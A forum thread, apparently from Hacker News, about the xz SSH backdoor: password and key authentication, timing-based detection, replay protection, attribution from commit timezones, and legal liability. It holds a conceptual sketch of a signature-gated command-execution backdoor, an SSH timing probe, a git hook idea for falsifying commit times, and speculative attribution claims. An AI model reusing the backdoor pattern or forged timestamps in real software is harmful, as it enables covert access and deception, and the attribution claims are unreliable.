Even so, these protocols require the server to know your actual password, not just a hash of the password, even though the password itself never traverses the network. So a compromised server can still lead to a compromised credential, and unless you use different passwords for every server, we're back to the same problem.
Asymmetric PAKEs don't require the server to know your password. You and the server need to have a discussion to establish some parameters that work for your chosen password, without revealing what it is, and then in future you can supply evidence that you indeed know the password (that is, some value which satisfies the agreed parameters), still without revealing what it is. This is not easy to do correctly, whereas it's really easy to get it wrong...
> Have to admit I've never understood why password auth is considered so much worse than using a cert
Password auth involves sending your credentials to the server. They're encrypted, but not irreversibly; the server needs your plaintext username and password to validate them, and it can, in principle, record them to be reused elsewhere.
Public key and certificate-based authentication only pass your username and a signature to the server. Even if you don't trust the server you're logging into, it can't do anything to compromise other servers that key has access to.
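A stripped-down sketch of why that is. This shows the general challenge/signature idea, not OpenSSH's actual wire protocol (real SSH has the client sign over the session identifier from the key exchange rather than a bare random challenge), and it uses the third-party `cryptography` package:

```python
# Minimal challenge/signature sketch of public-key authentication.
import os
from cryptography.exceptions import InvalidSignature
from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PrivateKey

# Client side: the private key never leaves this process.
client_key = Ed25519PrivateKey.generate()
public_key = client_key.public_key()   # this is what ends up in authorized_keys

# Server side: issues a fresh challenge per connection.
challenge = os.urandom(32)

# Client proves possession of the key by signing the challenge.
signature = client_key.sign(challenge)

# Server verifies against the stored public key. Even a malicious server only
# ever sees the public key and a signature over its own challenge; there is no
# reusable secret to steal, unlike a password sent as a bearer credential.
try:
    public_key.verify(signature, challenge)
    print("authenticated")
except InvalidSignature:
    print("rejected")
```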
> surely a decent password (long, random, etc) is for all practical purposes unguessable
Sadly that is not how normies use passwords. We know what password managers are for. The vast majority of people outside our confined sphere do not.
In short: password rotation policies make passwords overall less secure, because in order to remember what the new password is, people apply patterns. Patterns are guessable. Patterns get applied to future password as well. This has been known to the infosec people since 1990's because they had to understand how people actually behave. It took a research paper[0], published in 2010, to finally provide sufficient data for that fact to become undeniable.
It still took another 6-7 years until the information percolated through to the relevant regulatory bodies and for them to update their previous guidance. These days both NIST and NCSC tell in very clear terms to not require password rotation.
It depends what happens to the password. Typically it's sent as a bearer credential. But there are auth schemes (not widely used these days) where the password isn't sent over the wire.
Even if you use a scheme where the password never traverses the wire, the schemes still require the server to know what your password is in order to perform the authentication. So a compromised server still leads to compromise of your secret credential. Public key authentication does not have this property.
Wow, really? Ten years ago, it was drilled into me to never send a password like that, especially since the server shouldn't have the plain version anyway (so no reason for the client to send it).
I didn't want to believe you, but man, I just checked a few websites in the network inspector... and it seems like GMail, Hackernews, Wordpress, Wix, and Live.com all just sent it in plaintext with only SSL encryption :(
That's a bit disappointing. But TIL. Thanks for letting me know!
If you want to hop into a rabbit hole, try taking a look at how Steam's login sends the user and pass ))
If TLS breaks, then nothing is trusted anyway! If you can read the hash as a MITM, you can replay it as a password equivalent and log in with the hash; you don't need to know the original password. You can also just inject a script to exfiltrate the original password before it's hashed. CSP is broken too, since you can edit the headers to give your own script an inline nonce. In the end, I think everything relies on TLS.
I think 10 years ago, before TLS was the 99%+ standard on all sites, many people would come up with schemes; forums would MD5 the password client side and send the MD5, all sorts of things were common. But now the trust is in TLS.
> Salted hash for transmitting passwords is a good technique. This ensures that the password can not be stolen even if the SSL key is broken
I'm a little confused with this recommendation
How is the server supposed to verify the user's password in this case? Store the same hash with exactly the same salt in the database, effectively making the transmitted salted hash a cleartext password?
Yes, the server should never have the cleartext password. In this case the salted hash is the same as a password to you, but it protects users who reuse the same password across different sites. If your entire password DB gets leaked, the attacker would be able to login to your site as your users, but they wouldn't be able to login as those users to other sites without brute forcing all the hashes.
Edit: I guess the reverse is also true, that is, leaked user passwords from other sources can't be easily tested against your user accounts just by sending a bunch of HTTP requests to your server. The attacker would have to at least run the passwords through your particular salted hash scheme first (which they can get by reverse engineering your client, but it's extra labor and computation).
That page seems to be a community wiki, and I think the original authors are somewhat confused on that point.
If you salt and hash the password on the client side, how is the server going to verify the password? Everything I can think of either requires the server to store the plaintext password (bad) or basically makes the hashed bytes become the plaintext password (pointless).
But I think the point of salting + hashing the password isn't quite the same as what TLS offers. It's not necessarily to prevent MITM eavesdropping, but to help protect the user from credential re-use from leaks.
What I was taught is that your server should never have the user's cleartext password to begin with, only the salted hash. As soon as they set it, the server only ever gets (and saves) the salted hash. That way, in the worst-case scenario (data leak or rogue employee), at most your users would only have their accounts with you compromised. The salted hashes are useless anywhere else (barring quantum decryption). To you they're password equivalents, but they turn the user's weak reused password (that they may be using for banking, taxes, etc.) into a strong salted hash that's useless anywhere else.
That's the benefit of doing it serverside, at least.
Doing it clientside, too, means that the password itself is also never sent over the wire, just the salted hash (which is all the server needs, anyway), limiting the collateral damage if it IS intercepted in transit. But with widespread HTTPS, that's probably not a huge concern. I do think it can help prevent accidental leaks, like if your auth endpoint was accidentally misconfigured and caching or logging requests with cleartext passwords... again, just to protect the user from leaks.
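For what it's worth, the server-side half of that fits in a few lines. This uses Python's built-in scrypt; the cost parameters are illustrative, and a real deployment would choose them deliberately or use a maintained library such as argon2 or bcrypt:

```python
# Server-side salted password hashing: the server stores (salt, hash),
# never the cleartext password.
import hashlib, hmac, os

def hash_password(password: str) -> tuple[bytes, bytes]:
    salt = os.urandom(16)
    digest = hashlib.scrypt(password.encode(), salt=salt, n=2**14, r=8, p=1)
    return salt, digest

def verify_password(password: str, salt: bytes, stored: bytes) -> bool:
    candidate = hashlib.scrypt(password.encode(), salt=salt, n=2**14, r=8, p=1)
    return hmac.compare_digest(candidate, stored)

salt, stored = hash_password("correct horse battery staple")
print(verify_password("correct horse battery staple", salt, stored))  # True
print(verify_password("hunter2", salt, stored))                       # False
```

As the replies below note, doing an extra hash on the client side doesn't change this picture much: whatever value the server ultimately verifies is, from the server's point of view, the password.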
It doesn’t actually do anything because if SSL is compromised then all of the junk you think you are telling the client to do to the password is via JavaScript that is also compromised.
If you’re worried about passive listeners with ssl private keys, perfect forward secrecy at the crypto layer solved that a long time ago.
For browsers at least, sending passwords plainly over a tls session is as good as it gets.
It's not to protect against MITM but against credential reuse. It offers no additional security over SSL but what it does protect against is user passwords being leaked and attackers being able to reuse that same password across the user's other online accounts (banks, etc.).
No. Anything you do on the client side, you could just as well not do at all.
You can imagine the salted and hashed password in your scheme to be "the password". Because the server will still know it, and could use it to log in somewhere else (it just has to skip the salt-and-hash step).
On that last point, I wouldn't pass around the certificate to log in from multiple sources, rather each source would have its own certificate. That is easy & cheap to do (especially with ed25519 certs).
Ah right, that's useful, thanks. Presumably if you need to login from an untrusted source (e.g. in an emergency), then you're out of luck in that case? Do you maybe keep an emergency access cert stashed somewhere?
That's a very good question. It likely depends on the circumstances. I don't quite know any ways of using untrusted sources safely. Maybe something where you can use temporary credentials (say 2FA), or the likes of AWS's EC2 Instance Connect, but there's always the problem that _something_ has to be on an untrusted location, I guess?
Having some emergency access certs in a password manager might be a good backup (and rotating it after using it on an untrusted source?).
The best way is, however, removing the need in emergencies to access a machine (e.g. more of the "cattle vs pets" way of thinking). But that's hard for sure.
> ...rotating it after using it on an untrusted source?...
> ...the "cattle vs pets" way of thinking...
Good points both... To the former, of course you're right that once used, an emergency cert should be replaced, which could be onerous either from the point of view of having double the number of certs to manage (rather than one master key), or else having to rotate the master key on all servers. To the latter, I'm definitely thinking about pets, so I hadn't considered just throwing away the VM and starting again; that neatly sidesteps the issue.
A lot of it has to do with centralizing administration. If you have more than one server and more than one user, certificates reduce a NxM problem into N+M instead.
Certificates can be revoked, they can have short expiry dates and due to centralized administration, renewing them is not terribly inconvenient.
On top of that, they are a lot more difficult to read over the shoulder; to some degree that can be considered the second factor in an MFA scheme. Same reason why passkeys are preferred over passwords lately. Not as secure as a HW key, still miles better than "hunter2".
It might be possible to use timing information to detect this, since the signature verification code appears to only run if the client public key matches a specific fingerprint.
The backdoor's signature verification should cost around 100us, so keys matching the fingerprint should take that much longer to process than keys that do not match it. Detecting this timing difference should at least be realistic over LAN, perhaps even over the internet, especially if the scanner runs from a location close to the target. Systems that ban the client's IP after repeated authentication failures will probably be harder to scan.
According to [1], the backdoor introduces a much larger slowdown (without the backdoor: 0m0.299s; with the backdoor: 0m0.807s). I'm not sure exactly why the slowdown is so large.
The effect of the slowdown on the total handshake time wouldn't work well for detection, since without a baseline you can't tell if it's slow due to the backdoor, or due to high network latency or a slow/busy CPU. The relative timing of different steps in the TCP and SSH handshakes on the other hand should work, since the backdoor should only affect one/some steps (RSA verification), while others remain unaffected (e.g. the TCP handshake).
However only probabilistic detection is possible that way and really 100us variance over the internet would require many many detection attempts to discern.
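A crude starting point for the baseline approach might look like this: repeatedly time a full (failing) SSH authentication attempt against the suspect host and against a known-good host, and compare the distributions. This only measures end-to-end latency, so as noted above it is confounded by network and CPU load, and repeated attempts may trip fail2ban-style banning; it's a skeleton, not a reliable scanner. Hostnames are placeholders:

```python
# Crude timing probe: compare failed-login latency against a baseline host.
import statistics, subprocess, time

def time_ssh_attempt(host: str, attempts: int = 20) -> list[float]:
    samples = []
    for _ in range(attempts):
        start = time.perf_counter()
        subprocess.run(
            ["ssh", "-o", "BatchMode=yes", "-o", "StrictHostKeyChecking=no",
             "-o", "ConnectTimeout=5", f"probe@{host}", "true"],
            stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL,
        )
        samples.append(time.perf_counter() - start)
    return samples

baseline = time_ssh_attempt("known-good.example.org")  # placeholder hosts
target = time_ssh_attempt("suspect.example.org")
print("baseline median:", statistics.median(baseline))
print("target median:  ", statistics.median(target))
```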
The tweet says "unreplayable". Can someone explain how it's not replayable? Does the backdoored sshd issue some challenge that the attacker is required to sign?
What it does is this: RSA_public_decrypt verifies a signature on the client's (I think) host key by a fixed Ed448 key, and then if it verifies, passes the payload to system().
If you send a request to SSH to associate (agree on a key for private communications), signed by a specific private key, it will send the rest of the request to the "system" call in libc, which will execute it in bash.
So this is quite literally a "shellcode". Except, you know, it's on your system.
That sounds replayable though. If I did a tcpdump of the attacker attacking my system, I could replay that attack against some other system. For it to not be replayable, there needs to be some challenge issued by the backdoored sshd.
Of course since the backdoor was never widely deployed and is now public, I think it's unlikely the attacker will attempt to use it. So whether it's replayable doesn't have a practical impact now. I'm only asking about replayability because I'm curious how it's unreplayable.
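On the "how can it be unreplayable without a challenge" question: the public analyses suggest the Ed448 signature covers data derived from the target server's own host key (among other fields), and if that's right, no interactive challenge is needed; a capture from host A simply won't verify on host B. A generic sketch of that idea follows. It is the concept only, not the actual xz implementation, and it uses the third-party `cryptography` package:

```python
# Generic sketch: a payload whose signature is bound to the target's host key
# cannot be replayed against a different server.
import hashlib
from cryptography.exceptions import InvalidSignature
from cryptography.hazmat.primitives.asymmetric.ed448 import Ed448PrivateKey

operator_key = Ed448PrivateKey.generate()   # only the attacker has this
operator_pub = operator_key.public_key()    # baked into the backdoor

def build_payload(command: bytes, target_host_pub: bytes) -> bytes:
    signed = hashlib.sha256(target_host_pub).digest() + command
    return operator_key.sign(signed) + command

def backdoor_accepts(payload: bytes, my_host_pub: bytes):
    signature, command = payload[:114], payload[114:]  # Ed448 signatures are 114 bytes
    expected = hashlib.sha256(my_host_pub).digest() + command
    try:
        operator_pub.verify(signature, expected)
    except InvalidSignature:
        return None   # wrong signer, or captured from a different host
    return command    # would be handed to system() in the real thing

payload = build_payload(b"id > /tmp/pwned", b"host-A-public-key")
print(backdoor_accepts(payload, b"host-A-public-key"))  # accepted on host A
print(backdoor_accepts(payload, b"host-B-public-key"))  # replay on host B fails
```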
Unpopular opinion, but I cannot but admire the whole operation. Condemn it of course, but still admire it. It was a piece of art! From conception to execution, masterful! We got extremely lucky that it was caught so early.
If the payload didn't have a random .5 second hang during SSH login, it would probably not have been found for a long time.
Next time, the attackers will probably manage to build a payload that doesn't cause weird latency spikes on operations that people wait on.
(For some reason this brings to mind how Kim Dotcom figured out he was the target of an illegal wiretap... because he suddenly had a much higher ping in MW3. When he troubleshooted, he found out that all his packets specifically got routed a very long physical distance through a GCSB office. GCSB has no mandate to wiretap permanent NZ residents. He ended up getting a personal apology from the NZ Prime Minister.)
I'm a little out of touch, but for over a decade I'd say half the boxes I touched either didn't have enough entropy or were trying to do rDNS for (internal) ranges against servers that didn't host them, and it was nearly always hand-waved away by the team running it as NFN.
That is to say, a half-second pause during the ssh login is absolutely the _least_ suspicious place for it to happen, and I'm somewhat amazed anyone thought to go picking at it as quickly as they did.
What led to continuous investigation wasn't just the 500ms pause, but large spikes in CPU activity when sshd was invoked, even without a login attempt.
> "After all, He-Who-Must-Not-Be-Merged did great things - terrible, yes, but great."
I think the most ingenious part was picking the right project to infiltrate. Reading "Hans'" IFUNC pull request discussion is heart-wrenching in hindsight, but it really shows why this project was chosen.
I would love to know how many people were behind "Jia" and "Hans", analyzing and strategizing the communication and code contributions. Some aspects, like those third-tier personas faking pressure on mailing lists, seem a bit carelessly crafted, so I think it's still possible this was done by a sophisticated small team or even a single individual. I presume a state actor would have people pumping out and maintaining fake personas all day for these kinds of operations. I mean, it would have kinda sucked if someone had thought: "Hm. It's a bit odd how rudely these three users are pushing. Who are they anyway? Oh, look, they were all created at the same time. Suspicious. Why would anyone fake accounts to push so hard for this specifically? I need to investigate". Compared to the overall effort invested, that's careless, badly planned or underfunded.
> Compared to the overall effort invested, that's careless, badly planned or underfunded.
Not at all. It's a pattern that's very easy to spot while the eyes of the world are looking for it. When it was needed, it worked exactly as it needed to work. Had the backdoor not been discovered, no one would have noticed--just like no one did notice for the past couple of years.
Had anyone noticed at the time, it would have been very easy to just back off and try a different tactic a few months down the line. Once something worked, it would be quick to fade into forgotten history--unlikely to be noticed until, like now, the plan was already discovered.
I felt really bad for the original maintainer getting dog-piled by people who berated him for not doing his (unpaid) job and for supposedly bringing shame and discredit to himself and the community. Definitely cruel.
Though… do we know that the maintainer at that point was the same individual as the one who started the project? Goes deep, man.
It's possible the adversary was behind, or at least encouraged, the dog-pilers who berated him. Probably a normal, basic tactic from a funded evil team's playbook.
Might be worth reviewing those who berated him to see if they resolve to real people, to see how deep this operation goes.
Even if it's not his fault, the maintainer at this point won't be trusted at all. I feel for him; I think even finding a job right now would be impossible for him. Why would you hire someone who could be suspected of that?
No. From what I've read on the openwall and lkml mailing lists (so generally people who know a lot more about these things than I do), nobody accused Lasse Collin, the original maintainer, of being involved in this, at all, and there wasn't any notion of him becoming untrustworthy.
This could've happened to anybody, frankly. The attacker was advanced and persistent. I cannot help but feel sympathetic for the original maintainer here.
I bet it’s not that unpopular. It’s a very impressive attack in many ways:
- It’s subtle.
- It was built up over several years.
- If the attacker hadn't screwed up with the weird performance hit that triggered the investigation (my dramatic theory: the attacker was horrified at the infonuclear bomb they were detonating and deliberately messed up), we likely wouldn't know about it.
You can detest the end result while appreciating the complexity of the attack.
I'm assuming nation states and similar actors monitor mailing lists for phrases like "I'm feeling burnt out" or "not enough bandwidth, can you open a PR?"
So I imagine major actors already have other assets in at-risk open source projects, either for the source code or distro patch/packaging level. Is that too tinfoil hat? I only know enough about secops to be dangerous to myself and everyone around me.
It's been all of 24 hours; these things take time. Presumably someone doing an attack this audacious took steps to cover their tracks and is using a fake name.
CISA had a report on this pretty quickly. I think they refer cases to Secret Service for enforcement. But really, we seemingly have no idea who or where the perpetrator is located. This could easily be a state actor. It could be a lone wolf. And the effects of the attack would be global too, so jurisdiction is tricky. We really have no idea at this point. The personas used to push the commits and push for inclusion were almost certainly fronts. I'm sure github is sifting through a slew of subpoenas right now.
GitHub retains an incredible amount of data to review. But if it is a state actor, they likely covered their tracks very well. When I found the original address of the person who hacked Elon Musk's Twitter account, it led to an Amazon EC2 instance. That instance was bought with stolen financial information and accessed via several VPNs and proxies. I would expect state actors to further obfuscate their tracks with shell companies and the like.
Based on the level of sophistication being alluded to, I'm personally inclined to assume this is a state actor, possibly even some arm of the U.S. govt.
That would honestly be one of the most impactful bits of public service to fall out of any agency, regardless of country. Even if this is nefarious, a couple of intentionally clumsy follow-ups designed to draw further attention would be amazing to see. Think chaos monkey for software supply chain.
Can the community aspects of FOSS survive a Spy vs Spy environment though?
I don't know, but the answer is irrelevant to whether we are in one (we are).
I shudder to think what lurks in the not-open-source world. Closed-source software/firmware/microcode and closed-spec/closed-design hardware, along with the artificial restriction that keeps device owners from creating replacement code or modifying the code in consumer and capital goods that contain universal machines as components, are significant national security threats, and the practice of keeping design internals and intent secret in these products imposes a cost on society.
I propose that products which don't adhere to GNU-like standards of openness (caveat*) get national sales taxed some punitive obscene percentage, like 100%. This way the government creates an artificial condition which forces companies to comply lest their market pricing power be absolutely hobbled. If say your company makes five $10MM industrial machines for MEGACORP customer and you're the only game in town, MEGACORP can pay the sales tax. Brian, Dale, and Joe Sixpack can't afford $2,500+ iPhones and Playstations, or $70,000 base model Honda Civics (yes this should apply to cars and especially medical devices/prosthetics), so when Company B comes around making a somewhat inferior competing fully open product then Company A making the proprietary version loses a huge chunk of market share.
(*But not the GNU-spirit distribution rights, so the OEM or vendor is still the only entity legally allowed to distribute [except for national emergency level patches]. Patent rights still apply.)
This is the most direct and sane way to address the coming waves of decade+ old lightbulbs and flatscreens. It has the fewest "But if" gotcha exceptions with which to keep screwing you. Stop sticking up for your boss and think about the lack of access to your own devices, or better yet the implicit and nonconsensual perpetual access vendors maintain to universal machines which by all rights only you should have sovereign control over (like cooking your own microcode or tweaking Intel's [but not distributing your tweaks to Intel's])!
Overcomplicated design, sloppy opsec, and an Eastern European time zone altogether sound more like an attempt to snatch some bitcoins by a small group of people in such places.
> This individual/organization needs to be on the top of every country's most wanted lists
Because if the "organization" is a U.S. agency, not much is going to happen here. Russia or China or North Korea might make some strongly worded statements, but nothing is going to happen.
It's also very possible that security researchers won't be able to find out, and government agencies will finger-point as a means of misdirection.
For example, a statement comes out in a month that this was North Korea. Was it really? Or are they just a convenient scapegoat so the NSA doesn't have to play defense on its lack of accountability again?
Highly likely. China has been estimated to have cyber-hacking resources 10-50x what the USA currently has. It's not even close. The USA will have to up its game soon or accept China being able to shut down large swathes of the grid and critical infrastructure at will.
I did my own research. If you look at the git repository commit log and some mailing list messages, you will see that the author ("Jia Tan", fake name) speaks impeccable English (already lessens the chance of being a Chinese operative), however he commits in the +0800 time zone (Beijing). He works during Chinese holidays and doesn't work during Western holidays.
However, the times don't make sense: It looks like he works mostly at 2am: https://files.catbox.moe/6mdtez.png (hours in the +0800 timezone). I understand this to be indicative of using a different timezone on the computer than where he actually worked, possibly knowing that git commits include the timezone.
If you shift the timezone to US East Coast -0400, it suddenly looks like a very comfortable full-time job, including a fall in commit rate right where the lunch break should be: https://files.catbox.moe/dtvjzr.png
To me, considering that this appears to be a nation-state-tier attack, this heavily indicates that it was the Americans. Obviously not conclusive proof, but I think it is useful evidence.
Author: Jia Tan <jiat0218@gmail.com>
AuthorDate: Fri Jan 20 21:53:14 2023 +0800
New Years Day (Federal):
Author: Jia Tan <jiat0218@gmail.com>
AuthorDate: Mon Jan 2 22:33:48 2023 +0800
Edit: Also my graphs don't seem to match yours. Did you account for the fact that US/Eastern is -0500 part of the year? I show a spike at what would be 7 am Eastern for both author dates https://imgur.com/a/QcJy16h and commit dates https://imgur.com/a/oMsbNOh and essentially no work being done after noon.
It's a nice analysis, but he misses the fact that the Eastern European timezone doesn't match office hours either; in particular, it would mean he worked primarily in the evenings (see this graph https://files.catbox.moe/4itspl.png)
I had noticed UTC+0300 commits in the repository under his name but I believed they might have been simply committed by the main Finnish maintainer who is in the UTC+0300 timezone.
> But I would like to see analysis of timestamp of GitHub events (like PRs and comments timestamps) which are harder to fake.
I doubt the git commit timestamps are faked, since actually faking them is somewhat difficult to do consistently (you would time travel frequently). I don't think there is some kind of github API for this, however from what I've seen they seem to match up with the same work timespan you see in the commit timestamps.
> I had noticed UTC+0300 commits in the repository under his name but I believed they might have been simply committed by the main Finnish maintainer who is in the UTC+0300 timezone.
There was this one though where they are the author and committer... one in +0300, the other in +0800:
commit 3d1fdddf92321b516d55651888b9c669e254634e
Author: Jia Tan <jiat0218@gmail.com>
AuthorDate: Tue Jun 27 17:27:09 2023 +0300
Commit: Jia Tan <jiat0218@gmail.com>
CommitDate: Tue Jun 27 23:56:06 2023 +0800
The time between writing the file and the commit is 89 minutes.
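For anyone who wants to hunt for more of these mismatches, a minimal sketch, assuming you're inside a clone of the xz repo; with `--date=raw` each timestamp prints as `<epoch> <tz>`, so the third and fifth fields are the two timezone offsets:
```
# List commits whose author timezone differs from their committer timezone.
git log --pretty='%h %ad %cd' --date=raw |
  awk '$3 != $5 { print $1, "author tz", $3, "committer tz", $5 }'
```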
I literally run a git hook that fixes my commit times so I don't look like a freak to my coworkers making commits at 3am. I think an actor of this caliber would too, so I would bet the git commit times are highly choreographed.
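Not endorsing the practice, but as an illustration of how little the timestamps can be trusted, here's a minimal sketch of such a hook (the 09:00 pin and the hook layout are my own assumptions, not the poster's actual script):
```
#!/bin/sh
# .git/hooks/post-commit -- sketch: pin the commit just made to 09:00 on the
# same calendar day, for both author and committer dates.
[ -n "$SKIP_DATE_HOOK" ] && exit 0   # avoid recursing when we amend below
day=$(git log -1 --format=%ad --date=format:'%Y-%m-%d')
GIT_COMMITTER_DATE="$day 09:00:00" SKIP_DATE_HOOK=1 \
  git commit --amend --no-edit --date "$day 09:00:00"
```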
FYI, the Australian comment is wrong: WA (which uses UTC+8) does not observe DST (there's a party that wants to add it, and multiple referenda that failed to), and given ASIS is in Canberra (as far as we know ;)), it probably wasn't them.
> He works during Chinese holidays and doesn't work during Western holidays.
“Western Holidays”, as if that is a coherent, cross-nationally consistent set.
Beyond the fact that your specific suggestion of it being American makes little sense on this basis, since the set isn't accurate even if construed as American holidays, this phrasing is bizarre in this context.
I pulled the commit timestamps out of the git log and then processed them a bit with gnuplot. It should not be difficult to reproduce this graph, but I am not too much of a gnuplot wizard, so I first preprocessed this into some different files in a REPL. I don't have the full code of what I did, but it should not be difficult to reproduce: just parse the dates and look at the hours.
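If anyone wants to reproduce the per-hour counts without gnuplot, a rough sketch (assumes a checkout of the xz repo; `--date=format-local:` renders each timestamp in whatever TZ you pick, so you can flip between +0800 and US Eastern):
```
# Histogram of commit hours for the "Jia Tan" author, rendered in a chosen TZ.
TZ=Asia/Shanghai git log --author='Jia Tan' --pretty='%ad' \
  --date=format-local:'%H' | sort | uniq -c
TZ=America/New_York git log --author='Jia Tan' --pretty='%ad' \
  --date=format-local:'%H' | sort | uniq -c
```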
I understand the impulse to seek justice, but what crime have they committed? It's illegal to gain unauthorized access, but not to write vulnerable code. Is there evidence that this is being exploited in the wild?
I am definitely not a lawyer so I have no claim to knowing what is or is not a crime. However, if backdooring SSH on a potentially wide scale doesn't trip afoul of laws then we need to seriously have a discussion about the modern world. I'd argue that investigating this as a crime is likely in the best interest of public safety and even (I hesitate to say this) national security considering the potential scale of this. Finally, I would say there is a distinction between writing vulnerable code and creating a backdoor with malicious intent. It appears (from the articles I have been reading so far) that this was malicious, not an accident or lack of skill. We will see over the next few days though as more experts get eyes on this.
Agreed on a moral level, and it's true that describing this as simply "vulnerable code" doesn't capture the clear malicious intent. I'm just struggling to find a specific crime. CFAA requires unauthorized access to occur, but the attacker was authorized to publish changes to xz. Code is speech. It was distributed with a "no warranty" clause in the license.
> knowingly [cause] the transmission of a program, information, code, or command, and as a result of such conduct, intentionally causes damage without authorization, to a protected computer;
Where one of the definitions of “protected computer” is one that is used in interstate commerce, which covers effectively all of them.
The back door is damage. The resulting sshd is like a door with a broken lock. This patch breaks the lock. Transmitting the patch caused intentional damage.
Law isn't code. If someone finds precedent, there will be a way to argue it doesn't cover this specific scenario. They call this conversational process "hypos" in law school, and this fundamental truth is why you never hear of a lawyer being stumped as to how to defend a client.
Ultimately, the CFAA will get it done if it gets that far, armchair lawyering aside.
To pressure-test this fully, since this can be caricatured as "we can punish degenerate behavior as needed", which isn't necessarily great: it's also why there's a thin line between an authoritarian puppet judiciary and a fair one.
The malicious author caused the transmission of the release tarball to GitHub and the official project site. This act was intentional and as a direct result other computers were damaged (when their administrators unknowingly installed the backdoored library).
You’ve got to be joking if you’re saying that this wouldn’t be an open and shut case to prosecute. It’s directly on point. Law isn’t code, any jury would have zero trouble convicting on these facts.
CFAA covers distribution of malicious software without the owner's consent, the Wire Fraud Act covers malware distribution schemes intended to defraud for property, and the Computer Misuse Act in the UK is broad and far-reaching like the CFAA, so this likely falls afoul of that. The GDPR protects personal data, so there's possibly a case to be made that this violates that as well, though that might be a bit of a reach.
In which case the defense will claim, correctly, that this malware was never distributed. It was caught. "Attempted malware distribution" may not actually be a crime (but IANAL so I don't know).
If more than one person was involved, it'd presumably fall under criminal conspiracy. Clearly this was an overt act in furtherance of a crime (unauthorized access under CFAA, at the least).
Nah, the CIA assassinates people in MLAT zones all the time. The laws that apply to you and I don’t apply to the privileged operators of the state’s prerogatives.
We don’t even know that this specific backdoor wasn’t the NSA or CIA. Assuming it was a foreign intelligence service because the fake name was asian-sounding is a bit silly. The people who wrote this code might be sitting in Virginia or Maryland already.
Note that while “Eastern Europe” has firm connotations with countries of which some are known for having corrupt autocracies, booming shady businesses, and organized crime and cybercrime gangs in varying proportions, the time zone mentioned also covers Finland, from which the other author is supposed to be.
>They will as a result probably avoid traveling to unfriendly jurisdictions without a diplomatic passport.
First of all, it's not like their individual identities would ever be known.
Second, they would already know that traveling to a hostile country is a great way to catch bullshit espionage charges, maybe end up tortured, and certainly be used as a political pawn.
Third, this is too sloppy to have originated from there anyways—however clever it was.
Laws don’t fix technical issues any more than they fix physical ones. Clearly this was possible, so it could be done by a foreign intelligence agency or well-hidden criminal organization.
I think this is probably illegal. But, I think we should not punish this sort of thing too harshly. Tech is an ecosystem. Organizations need to evolve to protect themselves. Instead, we should make companies liable for the damage that happens when they are hit by one of these attacks.
Before anyone calls it out: yes, this will be blaming the victim. But, companies aren’t people, and so we don’t really need to worry about the psychological damage that victim blaming would do, in their case. They are systems, that respond to incentives, and we should provide the incentives to make them tough.
What is constantly overlooked here on HN is that in legal terms, one of the most important things is intent. Commenters on HN always approach legal issues from a technical perspective but that is simply not how the judicial system works. Whether something is “technically X” or not is irrelevant, laws are usually written with the purpose of catching people based on their intent (malicious hacking), not merely on the technicalities (pentesters distributing examples).
It is code, but it runs on human wetware which can decode input about actual events into output about intent, and reach consensus about this output via proper court procedures.
Calling this backdoor "vulnerable code" is a gross mischaracterization.
This is closer to a large scale trojan horse, that does not have to be randomly discovered by a hacker to be exploited, but is readily available for privileged remote code execution by whoever have the private key to access this backdoor.
No, it is not illegal to distribute malware by itself, but it is illegal to trick people into installing malware. The latter was the goal of the XZ contributor.
Specifically, the CFAA covers distribution of malicious software without the owner's consent. Security researchers downloading malware implicitly give consent to be downloading malware marked as such.
In the UK, at least, this would be unauthorised access to computer material under section 1 of the Computer Misuse Act 1990 - and I would assume that it would also fall foul of sections 2 ("Unauthorised access with intent to commit or facilitate commission of further offences") and 3A ("Making, supplying or obtaining articles for use in offence under section 1, 3 or 3ZA") as well.
If CFAA doesn't get this guy behind bars then the CFAA is somehow even worse. Not only is it an overbroad and confusing law, it's also not broad enough to actually handcuff people who write malicious code.
Imagine a future where state actors have hundreds of AI agents fixing bugs, gaining reputation while they slowly introduce backdoors. I really hope open source models succeed.
I work for a large closed-source software company and I can tell you with 100% certainty that it is full of domestic and foreign agents. Being open source means that more eyes can and will look at something. That only increases the chance of malicious actions being found out ... just like with this supply-chain attack.
Because in the closed source model the frustrated developer that looked into this SSH slowness submits a ticket for the owner of the malicious code to dismiss.
It’s insane to consider the actual discovery of this to be anything other than a lightning strike. What’s more interesting here is that we can say with near certainty that there are other backdoors like this out there.
> Imagine a future where state actors have hundreds of AI agents fixing bugs, gaining reputation while they slowly introduce backdoors. I really hope open source () succeed.
I guess we can only hope verifiable and open source models can counteract the state actors.
Not necessarily. A frustrated developer posts about it, it catches attention of someone who knows how to use Ghidra et al, and it gets dug out quite fast.
Except, with closed-source software maintained by a for-profit company, such a cockup would mean a huge reputational hit, with billions of dollars of lost market cap. So there are very strong incentives for companies to vet their devs, have proper code reviews, etc.
But with open source, anyone can be a contributor, everyone is a friend, and nobody is reliably real-world-identifiable. So carrying out such attacks is easier by orders of magnitude.
> So, there are very high incentives for companies to vet their devs, have proper code reviews, etc.
I'm not sure about that. It takes a few leetcode interviews to get into major tech companies. As for the review process, it's not always thorough (if it looks legit and the tests pass...). However, employees are identifiable and would take a huge risk being caught doing anything fishy.
We witnessed Juniper generating their VPN keys with Dual EC DRBG, and then the generator constants being subverted, with Juniper claiming not to know how it happened.
I don’t think it affected Juniper firewall business in any significant way.
... if we want security it needs trust anyway. it doesn't matter if it's amazing Code GPT or Chad NSA, the PR needs to be reviewed by someone we trust.
it's the trust that's the problem.
Web-of-trust purists were right, just ahead of their time.
It would actually be sort of interesting if multiple adversarial intelligence agencies could review and sign commits. We might not trust any particular intelligence agency, but I bet the NSA and China would both be interested in not letting much through, if they knew the other guy was looking.
That is an interesting solution. If China, the US, Russia, the EU, etc. all sign off and say "yep, this is secure", we should trust it, since if they think they found an exploit, they might assume the other side found it too. This is a little bit like fair cake-cutting: if two people want the last of the cake, one cuts and the other chooses first. The chooser will take the bigger slice, so the cutter, knowing they'll get the smaller one, cuts as evenly as possible. In this case the NSA makes the cut (the code), and Russia / China choose whether it's allowed in.
This is why Microsoft bought GitHub and has been onboarding major open source projects: they will be the trusted third party (whether we like it or not is a different story).
Imagine a world where a single OSS maintainer can do the work of 100 of today’s engineers thanks to AI. In the world you describe, it seems likely that contributors would decrease as individual productivity increases.
Wouldn't everything produced by an AI explicitly have to be checked/reviewed by a human? If not, then the attack vector just shifts to the AI model and that's where the backdoor is placed. Sure, one may be 50 times more efficient at maintaining such packages but the problem of verifiably secure systems actually gets worse not better.
> OpenSSH certs are weird in that they include the signer's public key.
